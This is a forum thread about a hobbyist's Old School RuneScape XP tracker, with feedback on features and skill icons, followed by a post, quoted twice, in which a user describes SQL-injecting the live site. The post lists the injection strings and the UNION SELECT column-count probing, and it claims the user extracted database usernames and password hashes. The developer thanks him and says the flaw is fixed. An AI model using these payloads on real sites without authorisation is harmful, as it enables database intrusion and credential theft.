Jump to content

OSRS xp tracking website

pankijs

By pankijs
in Old School RuneScape

 Share

Recommended Posts

UserOnRS

UserOnRS

Posted
Posted

Looks alright and I wish you the best of luck, but Foot's website (http://crystalmathlabs.com/tracker/) looks to be able to do everything your tracker does and more, so personally I'll stick to using that.

 

It doesn't mean there's no place for your site however; for the EOC I used both Runetrack and Runetracker, but for now your site doesn't have anything really that'll make me want to visit your site over what's already available.

imagangster.png
Link to comment
Share on other sites
pankijs

pankijs

Posted
  • Author
Posted

Looks alright and I wish you the best of luck, but Foot's website (http://crystalmathlabs.com/tracker/) looks to be able to do everything your tracker does and more, so personally I'll stick to using that.

 

It doesn't mean there's no place for your site however; for the EOC I used both Runetrack and Runetracker, but for now your site doesn't have anything really that'll make me want to visit your site over what's already available.

 

thanks for feedback :)

my site is still in beta. like, im opened for fresh ideas and willing to make them, just name what you want to see, sigs, races, just name it. :)

t5FHqbT.jpgz3PhbtJ.jpg
Link to comment
Share on other sites
pankijs

pankijs

Posted
  • Author
Posted

On a design note, why does it use the updated live game skill icons? :/

 

i didn't liked the old school icons, and they are very small. also they didnt fit in design as good as new ones.

t5FHqbT.jpgz3PhbtJ.jpg
Link to comment
Share on other sites
Ammako

Ammako

Posted
Posted

Looking good, but even though I prefer the updated, live game skill icons over the Old School ones, I think that the Old School icons would be better in this case, because it's a tracker for Old School, would make more sense to have graphics from Old School.

Link to comment
Share on other sites
Ammako

Ammako

Posted
Posted

Surely we can get someone to manually fix them?

 

Although it's quite funny that the two current live game trackers use the old school skill icons, while your Old School tracker uses the live game skill icons.

Link to comment
Share on other sites
crazycdcm

crazycdcm

Posted
Posted

Well, out of some spare time, here is the set of oldshool icons, as a sprite - vertically centred and on a 35px horizontal grid, on transparent background For anyone who ever may have need for them!

 

ifc7V0G.png

 

E: this version is better, a few pixels were on vacation in the last version..

 

E2: Forgot overall. shj0gnl.png

  • Like 2

LgEZt.png

Link to comment
Share on other sites
crazycdcm

crazycdcm

Posted
Posted

Thanks a lot for this. I really learned a lot of SQL injection from using this website.

 

"View your prog" injection:

The following shows all data points in your database in a single choppy graph

alkan' or '1'='1

 

Combines the graph of alkan and leyatis in one!

alkan' or Name='leyatis

 

"Goals" search injection:

Shows all goals in the search list

' or '1'='1

' union select * from goals where '1'='1

 

After the query above, I started doing

' union select all 1,2,'a <FAIL

then

' union select all 1,2,3,'a <FAIL

then

' union select all 1,2,3,4,'a <FAIL

until finally this worked

' union select all 1,2,3,4,5,6,7,'a <WIN

Since it displayed 2 and 3 on the website, all I had to do is substitute the 2 or 3 with something like user(),@@version, or database(), and I could extract anything I wanted from your database. I even obtained 3 database usernames and password hashes. The password to root@localhost starts with "ca". I really suggest filtering your input a bit more to avoid more of this.

oh dear..

LgEZt.png

Link to comment
Share on other sites
pankijs

pankijs

Posted
  • Author
Posted

Thanks a lot for this. I really learned a lot of SQL injection from using this website.

 

"View your prog" injection:

The following shows all data points in your database in a single choppy graph

alkan' or '1'='1

 

Combines the graph of alkan and leyatis in one!

alkan' or Name='leyatis

 

"Goals" search injection:

Shows all goals in the search list

' or '1'='1

' union select * from goals where '1'='1

 

After the query above, I started doing

' union select all 1,2,'a <FAIL

then

' union select all 1,2,3,'a <FAIL

then

' union select all 1,2,3,4,'a <FAIL

until finally this worked

' union select all 1,2,3,4,5,6,7,'a <WIN

Since it displayed 2 and 3 on the website, all I had to do is substitute the 2 or 3 with something like user(),@@version, or database(), and I could extract anything I wanted from your database. I even obtained 3 database usernames and password hashes. The password to root@localhost starts with "ca". I really suggest filtering your input a bit more to avoid more of this.

 

oh sh1t.

thanks man, you helped a lot, i completely forgot to escape mysql strings.

begginners mistakes.

 

fixed now though.

t5FHqbT.jpgz3PhbtJ.jpg
Link to comment
Share on other sites
Foot

Foot

Posted
Posted

Thanks a lot for this. I really learned a lot of SQL injection from using this website.

 

"View your prog" injection:

The following shows all data points in your database in a single choppy graph

alkan' or '1'='1

 

Combines the graph of alkan and leyatis in one!

alkan' or Name='leyatis

 

"Goals" search injection:

Shows all goals in the search list

' or '1'='1

' union select * from goals where '1'='1

 

After the query above, I started doing

' union select all 1,2,'a <FAIL

then

' union select all 1,2,3,'a <FAIL

then

' union select all 1,2,3,4,'a <FAIL

until finally this worked

' union select all 1,2,3,4,5,6,7,'a <WIN

Since it displayed 2 and 3 on the website, all I had to do is substitute the 2 or 3 with something like user(),@@version, or database(), and I could extract anything I wanted from your database. I even obtained 3 database usernames and password hashes. The password to root@localhost starts with "ca". I really suggest filtering your input a bit more to avoid more of this.

 

oh sh1t.

thanks man, you helped a lot, i completely forgot to escape mysql strings.

begginners mistakes.

 

fixed now though.

Not a problem. I had a lot of fun.

http://www.crystalmathlabs.com/tracker/
Link to comment
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now
 Share
Go to topic listing
×
×
  • Create New...

Important Information

By using this site, you agree to our Terms of Use.

  I accept